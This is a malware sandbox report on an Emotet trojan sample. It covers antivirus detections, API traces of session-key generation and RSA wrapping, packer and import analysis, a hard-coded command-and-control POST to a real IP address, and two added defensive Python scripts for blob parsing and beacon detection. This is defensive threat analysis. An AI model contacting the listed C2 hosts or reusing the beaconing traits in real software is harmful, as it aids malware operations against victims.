Score: 7.0
Risk level: High

SHA256: 89d1bb8e69be422ff42ad9a8d05326da700590d564a659bd0ac6861c3c6f5361

File name: dd1ea1b3e5eb110e1214be66f8249411.exe

Analysis duration: 76s

Last analysed:

File size: 156.0KB
Flagged by static analysis  Flagged by dynamic analysis  Detection tags: AI SCORE=87 AIDETECTVM BANKERX BGTW BSCOPE CKGENERIC CLASSIC ELDORADO EMOTET GENCIRC GENERICKDZ GENKRYPTIK HFKT HIGH CONFIDENCE HQUVIY JY0@AGC6TJMI KRYPTIK MALWARE1 QFRZM QVM07 R + TROJ R002C0DH820 R347470 SCORE SUSGEN TRST UNCLASSIFIEDMALWARE@0 UNSAFE ZEXAE
HawkEye engine
Not detected: no HawkEye engine result for this sample
Static verdict
Antivirus engines
Engine        Result                             Scan date    Engine version
Alibaba       Trojan:Win32/Emotet.9435fd82       2019-05-27   0.3.0.5
Baidu         -                                  2019-03-18   1.0.0.2
Kingsoft      -                                  2020-09-05   2013.8.14.323
McAfee        Emotet-FRT!DD1EA1B3E5EB            2020-09-04   6.0.6.653
Tencent       Malware.Win32.Gencirc.10cde668     2020-09-05   1.0.0.1
CrowdStrike   -                                  2019-07-02   1.0
("-" = no result recorded in the report)
Static indicators
Queries the computer name (1 event)
Time               API               Arguments                  Status   Return  Repeated
1619948432.643241  GetComputerNameA  computer_name: OSKAR-PC    success  1       0
Uses Windows APIs to generate a cryptographic key (4 events)
Time / API / Status Return Repeated, with arguments indented below each call
1619948417.018241  CryptGenKey  success 1 0
    crypto_handle: 0x0084b078
    algorithm_identifier: 0x0000660e (CALG_AES_128; the sandbox left the name blank)
    provider_handle: 0x0084a918
    flags: 1 (CRYPT_EXPORTABLE)
    key: f&fcr5TðzÙÇÀÕË  (binary, shown with non-printable bytes dropped)
1619948432.659241  CryptExportKey  success 1 0
    crypto_handle: 0x0084b078
    crypto_export_handle: 0x0084a9e0
    blob_type: 1 (SIMPLEBLOB)
    flags: 64 (CRYPT_OAEP)
    buffer: f¤òø¯ ¶oNÆc_ÃPúÅü79VØÑd0“Ý“¨ŽÆ»Ýc,Ñ£—Ï÷I®‹Ü3Ø@ ~Y²s<¼ÍÙ¦îýSç!ø§â¤5î¼B¼&…n®õ=ýyb&eÝôV-¸  (binary, non-printable bytes dropped)
1619948438.674241  CryptExportKey  success 1 0
    crypto_handle: 0x0084b078
    crypto_export_handle: 0x0084a9e0
    blob_type: 1 (SIMPLEBLOB)
    flags: 64 (CRYPT_OAEP)
    buffer: f¤â¬˜µZiÿ³È€ÒUè1ˆñ _"¶h4h(Þ¬®ïñêϘ„X•i“ øÏ !°Ö+•PŒ‹A2»î—³®Åý¦uPî)vÛAùtü“I¶[Vï!-˜-¬k“¿  (binary, non-printable bytes dropped)
1619948470.284241  CryptExportKey  success 1 0
    crypto_handle: 0x0084b078
    crypto_export_handle: 0x0084a9e0
    blob_type: 1 (SIMPLEBLOB)
    flags: 64 (CRYPT_OAEP)
    buffer: f¤¢—ž`Ž”îùØß ³0瞈;ï>šà%Í¨ëð’jbêp—¬J‡$ˆ®lJËB¸áÈÙ¸¹*ŸÞ Ë@¨&¥Û·Ä±fÉóÊߚ’T Åó»OÍ«"ԃx  (binary, non-printable bytes dropped)
Reading: a single exportable 128-bit AES key (handle 0x0084b078) is generated once, then exported three times as a SIMPLEBLOB with OAEP padding against the same key-exchange key handle 0x0084a9e0, i.e. the session key is wrapped with an RSA key-exchange key already present in the provider. The first export (1619948432.659) immediately precedes the InternetOpenW call at 1619948432.784 recorded under the dynamic indicators. The leading "f¤" visible in every exported buffer is consistent with the SIMPLEBLOB header: 0x66 is the printable byte of aiKeyAlg 0x0000660e and 0xa4 the printable byte of the wrapping ALG_ID 0x0000a400 (CALG_RSA_KEYX); the remaining header bytes are non-printable and were dropped by the viewer.
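To make the constants in this trace concrete, the following is an added example (written for this report, not code from the sample or the sandbox) that decodes ALG_ID values and parses the SIMPLEBLOB layout that CryptExportKey produces. The blob it parses is constructed to carry the header the trace implies (a CALG_AES_128 key wrapped with CALG_RSA_KEYX); its wrapped-key payload is deterministic filler, not the sample's real export. It also reproduces the report viewer's printable-only rendering to show why every exported buffer begins with "f¤".

```python
"""
Decode CryptoAPI constants and the SIMPLEBLOB layout seen in the trace.

Added example for this report, not code from the sample or the sandbox.
The blob built here is CONSTRUCTED: header as implied by the trace,
payload is filler rather than real key material.
"""
import struct

# ALG_ID layout from wincrypt.h: class << 13 | type << 9 | sid
CALG_AES_128 = 0x0000660E
CALG_RSA_KEYX = 0x0000A400
ALG_NAMES = {
    0x00006603: "CALG_3DES",
    0x00006801: "CALG_RC4",
    CALG_AES_128: "CALG_AES_128",
    0x0000660F: "CALG_AES_192",
    0x00006610: "CALG_AES_256",
    0x00002400: "CALG_RSA_SIGN",
    CALG_RSA_KEYX: "CALG_RSA_KEYX",
}
ALG_CLASSES = {1: "SIGNATURE", 3: "DATA_ENCRYPT", 4: "HASH", 5: "KEY_EXCHANGE"}

CRYPT_EXPORTABLE = 0x00000001   # CryptGenKey dwFlags value 1 in the trace
CRYPT_OAEP = 0x00000040         # CryptExportKey dwFlags value 64 in the trace
CUR_BLOB_VERSION = 2
SIMPLEBLOB = 0x1                # blob_type 1 in the trace
BLOB_TYPES = {0x1: "SIMPLEBLOB", 0x6: "PUBLICKEYBLOB", 0x7: "PRIVATEKEYBLOB", 0x8: "PLAINTEXTKEYBLOB"}
HEADER_LEN = 12                 # BLOBHEADER (8 bytes) + wrapping ALG_ID (4 bytes)


def split_alg_id(alg_id):
    """Break an ALG_ID into its class, type and SID fields plus a name."""
    return {
        "class": ALG_CLASSES.get((alg_id >> 13) & 0x7, "other"),
        "type": (alg_id >> 9) & 0xF,
        "sid": alg_id & 0x1FF,
        "name": ALG_NAMES.get(alg_id, "unknown"),
    }


def parse_simpleblob(blob):
    """Parse a CryptExportKey SIMPLEBLOB: BLOBHEADER, wrapping ALG_ID, wrapped key."""
    if len(blob) < HEADER_LEN:
        raise ValueError("blob shorter than BLOBHEADER + ALG_ID")
    b_type, b_version, _reserved, ai_key_alg = struct.unpack_from("<BBHI", blob, 0)
    (wrap_alg,) = struct.unpack_from("<I", blob, 8)
    if b_type != SIMPLEBLOB:
        raise ValueError(f"not a SIMPLEBLOB: bType={b_type:#x} ({BLOB_TYPES.get(b_type, 'unknown')})")
    if b_version != CUR_BLOB_VERSION:
        raise ValueError(f"unexpected bVersion {b_version}")
    return {
        "key_alg": split_alg_id(ai_key_alg),
        "wrap_alg": split_alg_id(wrap_alg),
        # For an RSA wrap the payload is one modulus-sized block (PKCS#1 v1.5 or OAEP)
        "wrapped_key_len": len(blob) - HEADER_LEN,
    }


def printable_view(data):
    """Reproduce the report viewer's rendering: keep only printable Latin-1 bytes."""
    return "".join(chr(b) for b in data if 0x20 <= b <= 0x7E or 0xA1 <= b <= 0xFF)


def build_demo_blob(modulus_bytes=128):
    """CONSTRUCTED blob: header as the trace implies, payload is filler (not a real key)."""
    header = struct.pack("<BBHI", SIMPLEBLOB, CUR_BLOB_VERSION, 0, CALG_AES_128)
    header += struct.pack("<I", CALG_RSA_KEYX)
    filler = bytes((i * 37 + 11) & 0xFF for i in range(modulus_bytes))
    return header + filler


if __name__ == "__main__":
    blob = build_demo_blob()
    print(parse_simpleblob(blob))
    print("viewer shows the header as:", repr(printable_view(blob[:HEADER_LEN])))
```

Run against a real buffer, `wrapped_key_len` gives the RSA modulus size of the wrapping key, which is a quick way to group samples by embedded public key without unpacking them.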
The executable uses a known packer (1 event)
    packer: Armadillo v1.71
The file contains an unknown PE resource name possibly indicative of a packer (1 event)
    resource name: None
Behavioural verdict
Dynamic indicators
HTTP traffic contains suspicious features which may be indicative of malware-related traffic (1 event)
    suspicious_features: Connection to IP address
    suspicious_request: POST http://47.146.32.175/aQAfdIbhxEW/n2MfLIDptJt3/
Performs some HTTP requests (1 event)
    request: POST http://47.146.32.175/aQAfdIbhxEW/n2MfLIDptJt3/
Sends data using the HTTP POST method (1 event)
    request: POST http://47.146.32.175/aQAfdIbhxEW/n2MfLIDptJt3/
Allocates read-write-execute memory (usually to unpack itself) (1 event)
1619948416.534241  NtAllocateVirtualMemory  success 0 0  (return 0 = STATUS_SUCCESS)
    process_identifier: 368
    process_handle: 0xffffffff (current-process pseudo-handle)
    base_address: 0x021b0000
    region_size: 36864 (0x9000, nine 4 KiB pages)
    allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
    protection: 64 (PAGE_EXECUTE_READWRITE)
    stack_dep_bypass: 0
    stack_pivoted: 0
    heap_dep_bypass: 0
Checks adapter addresses, which can be used to detect virtual network interfaces (1 event)
1619948433.112241  GetAdaptersAddresses  failed 111 0
    flags: 0
    family: 0 (AF_UNSPEC)
Caveat: return value 111 is ERROR_BUFFER_OVERFLOW, the normal result of the first GetAdaptersAddresses call made with a too-small buffer to learn the required size; "failed" here does not mean the lookup was blocked, and a second call with the sized buffer would not be flagged separately by this signature.
Expresses interest in specific running processes (1 event)
    process: dd1ea1b3e5eb110e1214be66f8249411.exe (the sample itself)
Reads the system's User Agent and subsequently performs requests (1 event)
1619948432.784241  InternetOpenW  success 13369348 0  (return 0x00cc0004, the HINTERNET session handle)
    user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    access_type: 0 (INTERNET_OPEN_TYPE_PRECONFIG, i.e. use the system proxy settings)
    proxy_name: (empty)
    proxy_bypass: (empty)
    flags: 0
Note: despite the signature name, the User-Agent string is passed in by the sample in this call; it is the same string that appears verbatim in the HTTP request recorded in the network section.
Network communication
Communicates with hosts for which no DNS query was performed (4 events)
    host: 172.217.24.14
    host: 200.55.243.138
    host: 212.51.142.238
    host: 47.146.32.175
Sets or modifies WPAD proxy auto-configuration state for traffic interception (15 events)
All 15 calls returned success (return 0, repeated 0). Value names are relative to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\.
Time               API             key_handle   Value name                                                        Type            Value
1619948435.674241  RegSetValueExA  0x0000039c   {40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason         4 (REG_DWORD)   1
1619948435.674241  RegSetValueExA  0x0000039c   {40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime           3 (REG_BINARY)  ÀÙ¿<=?× (8-byte FILETIME, non-printable bytes dropped)
1619948435.674241  RegSetValueExA  0x0000039c   {40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision               4 (REG_DWORD)   3
1619948435.674241  RegSetValueExW  0x0000039c   {40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName            1 (REG_SZ)      网络 2 ("Network 2", the Chinese-locale default network name)
1619948435.690241  RegSetValueExA  0x000003b4   0a-00-27-00-00-00\WpadDecisionReason                              4 (REG_DWORD)   1
1619948435.690241  RegSetValueExA  0x000003b4   0a-00-27-00-00-00\WpadDecisionTime                                3 (REG_BINARY)  ÀÙ¿<=?× (8-byte FILETIME, non-printable bytes dropped)
1619948435.690241  RegSetValueExA  0x000003b4   0a-00-27-00-00-00\WpadDecision                                    4 (REG_DWORD)   3
1619948435.706241  RegSetValueExW  0x00000398   WpadLastNetwork                                                   1 (REG_SZ)      {40112ABE-63B3-43C3-BE93-1440EE3AF106}
1619948436.128241  RegSetValueExA  0x000003c0   {40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason         4 (REG_DWORD)   1
1619948436.128241  RegSetValueExA  0x000003c0   {40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime           3 (REG_BINARY)  ù==?× (8-byte FILETIME, non-printable bytes dropped)
1619948436.128241  RegSetValueExA  0x000003c0   {40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision               4 (REG_DWORD)   0
1619948436.128241  RegSetValueExW  0x000003c0   {40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName            1 (REG_SZ)      网络 2 ("Network 2")
1619948436.143241  RegSetValueExA  0x000003c4   0a-00-27-00-00-00\WpadDecisionReason                              4 (REG_DWORD)   1
1619948436.143241  RegSetValueExA  0x000003c4   0a-00-27-00-00-00\WpadDecisionTime                                3 (REG_BINARY)  ù==?× (8-byte FILETIME, non-printable bytes dropped)
1619948436.143241  RegSetValueExA  0x000003c4   0a-00-27-00-00-00\WpadDecision                                    4 (REG_DWORD)   0
Triage caveat: every write is to the per-network bookkeeping values (WpadDecision, WpadDecisionReason, WpadDecisionTime, WpadNetworkName, WpadLastNetwork) under the network-GUID and adapter-MAC subkeys of Wpad. These are the values the WinHTTP/WinINet proxy auto-detection code records when it evaluates WPAD for a network, and no AutoConfigURL, ProxyServer or ProxyEnable value is set anywhere in the recorded events. Read this signature as a side effect of the InternetOpenW call with INTERNET_OPEN_TYPE_PRECONFIG above, not as evidence that the sample installs a PAC file. The adapter key 0a-00-27-00-00-00 is the default MAC of the VirtualBox host-only adapter, consistent with the 192.168.56.101 guest address in the TCP/UDP tables below.
Connects to an IP address that is no longer responding to requests (legitimate services usually remain up and running) (1 event)
    dead_host: 212.51.142.238:8080
File has been identified by 54 antivirus engines on VirusTotal as malicious (50 of 54 shown)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.69294
FireEye Trojan.GenericKDZ.69294
CAT-QuickHeal Trojan.CKGENERIC
ALYac Trojan.GenericKDZ.69294
Cylance Unsafe
Zillya Backdoor.Emotet.Win32.905
Sangfor Malware
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Trojan:Win32/Emotet.9435fd82
K7GW Riskware ( 0040eff71 )
Arcabit Trojan.Generic.D10EAE
Invincea Mal/Generic-R + Troj/Emotet-CKR
BitDefenderTheta Gen:NN.ZexaE.34216.jy0@aGc6tJmi
Cyren W32/Emotet.APA.gen!Eldorado
Symantec Trojan.Emotet
APEX Malicious
ClamAV Win.Packed.Emotet-9623870-0
Kaspersky Backdoor.Win32.Emotet.bgtw
BitDefender Trojan.GenericKDZ.69294
NANO-Antivirus Trojan.Win32.Emotet.hquviy
ViRobot Trojan.Win32.Z.Emotet.159744.LI
Rising Trojan.Kryptik!1.CA51 (CLASSIC)
Ad-Aware Trojan.GenericKDZ.69294
TACHYON Backdoor/W32.Emotet.159744
Comodo .UnclassifiedMalware@0
F-Secure Trojan.TR/Crypt.Agent.qfrzm
DrWeb Trojan.Emotet.999
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R002C0DH820
Sophos Troj/Emotet-CKR
Ikarus Trojan-Banker.Emotet
Jiangmin Backdoor.Emotet.pw
MaxSecure Trojan.Malware.104539068.susgen
Avira TR/Crypt.Agent.qfrzm
Antiy-AVL Trojan/Win32.Generic
Microsoft Trojan:Win32/Emotet.GM!MTB
AegisLab Trojan.Win32.Emotet.trsT
ZoneAlarm Backdoor.Win32.Emotet.bgtw
GData Trojan.GenericKDZ.69294
Cynet Malicious (score: 85)
AhnLab-V3 Trojan/Win32.GenKryptik.R347470
McAfee Emotet-FRT!DD1EA1B3E5EB
MAX malware (ai score=87)
VBA32 BScope.Backdoor.Emotet
Malwarebytes Trojan.MalPack.TRE
ESET-NOD32 a variant of Win32/Kryptik.HFKT
TrendMicro-HouseCall TROJ_GEN.R002C0DH820
Tencent Malware.Win32.Gencirc.10cde668
Visual analysis
Binary image
None: no binary visualisation image was generated for this sample
Run-time screenshots
None: no screenshots were captured while the sample ran

PE Compile Time

2020-08-07 04:50:00 (note: the 2019 dates in the static antivirus table above predate this timestamp, so either the compile timestamp is forged or those dates are engine-definition dates rather than scan dates)

Imports

Library SHLWAPI.dll:
0x417e24 PathFindExtensionA
0x417e28 PathFileExistsA
Library MFC42.DLL: 196 imports by ordinal, occupying consecutive 4-byte IAT slots 0x4178ec through 0x417bf8 (MFC42 exports by ordinal, so the parser resolved no names)
Library MSVCRT.dll:
0x417d00 _initterm
0x417d04 __setusermatherr
0x417d08 _adjust_fdiv
0x417d0c __p__commode
0x417d10 __p__fmode
0x417d14 __set_app_type
0x417d18 _controlfp
0x417d1c ?terminate@@YAXXZ
0x417d20 _except_handler3
0x417d24 _onexit
0x417d28 __dllonexit
0x417d2c time
0x417d30 __getmainargs
0x417d34 memset
0x417d38 atoi
0x417d3c _wcslwr
0x417d40 calloc
0x417d44 malloc
0x417d48 free
0x417d4c memcpy
0x417d50 sprintf
0x417d54 isprint
0x417d58 _stat
0x417d5c _mbsicmp
0x417d60 _mbscmp
0x417d64 fseek
0x417d68 _setmbcp
0x417d6c _acmdln
0x417d70 exit
0x417d74 _XcptFilter
0x417d78 strlen
0x417d7c _exit
0x417d80 _ftol
0x417d84 ceil
0x417d88 fopen
0x417d8c fwrite
0x417d90 fclose
0x417d94 __CxxFrameHandler
0x417d98 _EH_prolog
0x417d9c strtol
0x417da0 ftell
Library KERNEL32.dll:
0x41786c LoadLibraryA
0x417870 LoadLibraryExW
0x417874 LoadLibraryExA
0x417878 GetProcAddress
0x41787c WaitForSingleObject
0x417880 ResetEvent
0x417884 GetModuleHandleA
0x417888 GetStartupInfoA
0x41788c CreateEventA
0x417890 GetLastError
0x417894 FreeLibrary
0x417898 GlobalSize
0x41789c GlobalAlloc
0x4178a0 GlobalLock
0x4178a4 GlobalUnlock
0x4178a8 CloseHandle
0x4178ac CreateDirectoryA
0x4178b0 lstrlenA
Library USER32.dll:
0x417e58 EnableScrollBar
0x417e5c SetScrollInfo
0x417e60 ReleaseCapture
0x417e64 GetKeyState
0x417e6c EnableMenuItem
0x417e70 GetSubMenu
0x417e74 EmptyClipboard
0x417e78 InvalidateRect
0x417e7c CreateWindowExA
0x417e80 InSendMessage
0x417e84 MessageBoxA
0x417e88 PtInRect
0x417e8c CreateCaret
0x417e90 DragDetect
0x417e94 SetCapture
0x417e98 RedrawWindow
0x417e9c SetScrollPos
0x417ea0 DestroyCaret
0x417ea4 ShowCaret
0x417ea8 FillRect
0x417eac DrawTextA
0x417eb0 GetSysColor
0x417eb4 EnableWindow
0x417eb8 LoadMenuA
0x417ebc IsIconic
0x417ec0 LoadIconA
0x417ec4 GetSystemMetrics
0x417ec8 GetClientRect
0x417ecc SendMessageA
0x417ed0 DrawIcon
0x417ed4 SetMenu
0x417ed8 SetCaretPos
Library GDI32.dll:
0x417814 CreateCompatibleDC
0x417818 CreateSolidBrush
0x41781c SetBoundsRect
0x417820 GetCharWidthA
0x417828 TextOutA
0x41782c BitBlt
0x417830 CreateFontA
0x417834 SelectObject
Library SHELL32.dll:
0x417df0 DragQueryFileA
0x417df4 DragFinish
Library ole32.dll:
0x417f20 OleUninitialize
0x417f24 OleInitialize
0x417f28 CoCreateInstance
Library MSVCP60.dll:

Note on the import table: the resolved imports describe an ordinary MFC GUI program (scroll bars, caret, clipboard, drag-and-drop, menus). Neither wininet.dll nor advapi32.dll appears, yet the run-time trace shows InternetOpenW, CryptGenKey and CryptExportKey being called. Together with LoadLibraryA/LoadLibraryExA/LoadLibraryExW and GetProcAddress in the KERNEL32 imports and the Armadillo packer match, this is consistent with the real payload resolving its APIs at run time after unpacking into the RWX region allocated above.

Hosts

No hosts contacted. (This conflicts with the TCP table below, which records a connection to 47.146.32.175:80; the sample connected by IP address without any DNS resolution.)

TCP

Source Source Port Destination Destination Port
192.168.56.101 49174 47.146.32.175 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 50537 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702
Note: all UDP traffic is Windows background chatter from the guest: DNS to the public resolver 114.114.114.114, NetBIOS name/datagram broadcasts (137/138), LLMNR (5355 to 224.0.0.252), SSDP (1900) and WS-Discovery (3702) multicasts. None of the four IPs in the "no DNS query" finding appears here, which matches the sample connecting to hard-coded addresses.

HTTP & HTTPS Requests

URI Data
http://47.146.32.175/aQAfdIbhxEW/n2MfLIDptJt3/
POST /aQAfdIbhxEW/n2MfLIDptJt3/ HTTP/1.1
Referer: http://47.146.32.175/aQAfdIbhxEW/n2MfLIDptJt3/
Content-Type: multipart/form-data; boundary=---------------------------798350694272319
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 47.146.32.175
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache
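Suricata and Snort raised no alerts on this capture, so the request head above is the only network artefact to key on. The following is an added example (written for this report, not a sandbox or IDS vendor rule) that scores the traits a practitioner would combine for a beacon detection: POST to a bare IP, random-looking mixed-case path segments, the legacy IE7/Trident 4.0 User-Agent, a multipart/form-data body, a Referer equal to the request URL itself, and Cache-Control: no-cache. CAPTURED_REQUEST is the request exactly as printed above; BENIGN_REQUEST is a constructed control (example.com hostname and path) to show the scorer does not fire on an ordinary multipart upload.

```python
"""
Heuristic beacon scorer for an HTTP request head.

Added example for this report, not the sandbox's or any IDS vendor's rule.
CAPTURED_REQUEST is copied from the report; BENIGN_REQUEST is CONSTRUCTED.
"""
import ipaddress
import re
from urllib.parse import urlsplit

CAPTURED_REQUEST = """\
POST /aQAfdIbhxEW/n2MfLIDptJt3/ HTTP/1.1
Referer: http://47.146.32.175/aQAfdIbhxEW/n2MfLIDptJt3/
Content-Type: multipart/form-data; boundary=---------------------------798350694272319
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 47.146.32.175
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache
"""

# Constructed control: a normal browser upload to a named host with a readable path.
BENIGN_REQUEST = """\
POST /api/v2/upload HTTP/1.1
Host: files.example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Referer: https://files.example.com/upload
Content-Length: 1024
Connection: Keep-Alive
"""

SEGMENT_RE = re.compile(r"^[A-Za-z0-9]{8,20}$")


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (method, path, {lower-name: value})."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the headers; the body is not needed here
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_bare_ipv4(host):
    """True when the Host header is an IPv4 literal (optionally with :port)."""
    try:
        return isinstance(ipaddress.ip_address(host.split(":")[0]), ipaddress.IPv4Address)
    except ValueError:
        return False


def looks_random(segment):
    """Mixed-case alphanumeric run of 8-20 chars with no separators."""
    return (bool(SEGMENT_RE.match(segment))
            and any(c.islower() for c in segment)
            and any(c.isupper() for c in segment))


def beacon_features(raw):
    """Return the list of beacon-like traits present in the request head."""
    method, path, headers = parse_request(raw)
    host = headers.get("host", "")
    ua = headers.get("user-agent", "")
    hits = []
    if method == "POST" and is_bare_ipv4(host):
        hits.append("POST to a bare IP address, no hostname")
    segments = [s for s in path.split("/") if s]
    if len(segments) >= 2 and path.endswith("/") and all(looks_random(s) for s in segments):
        hits.append("path of random-looking mixed-case segments ending in /")
    if "MSIE 7.0" in ua and "Trident/4.0" in ua:
        hits.append("legacy IE7 / Trident 4.0 User-Agent")
    if headers.get("content-type", "").lower().startswith("multipart/form-data"):
        hits.append("multipart/form-data upload body")
    ref = urlsplit(headers.get("referer", ""))
    if ref.netloc and ref.netloc == host and ref.path == path:
        hits.append("Referer equal to the request URL itself")
    if headers.get("cache-control", "").lower() == "no-cache":
        hits.append("Cache-Control: no-cache on a POST")
    return hits


def is_suspected_beacon(raw, threshold=4):
    """Flag when at least `threshold` traits co-occur; tune per environment."""
    return len(beacon_features(raw)) >= threshold


if __name__ == "__main__":
    for label, req in (("captured", CAPTURED_REQUEST), ("benign", BENIGN_REQUEST)):
        feats = beacon_features(req)
        print(f"{label}: {len(feats)} traits, beacon={is_suspected_beacon(req)}")
        for f in feats:
            print("  -", f)
```

Any one trait is common on its own (multipart uploads, proxies that add no-cache, old embedded browsers); the value is in the co-occurrence, which is why the threshold is on the count rather than on a single signature. The captured request matches all six traits, the constructed control only one.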

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Dropped files

No dropped files.

Dropped buffers

No dropped buffers.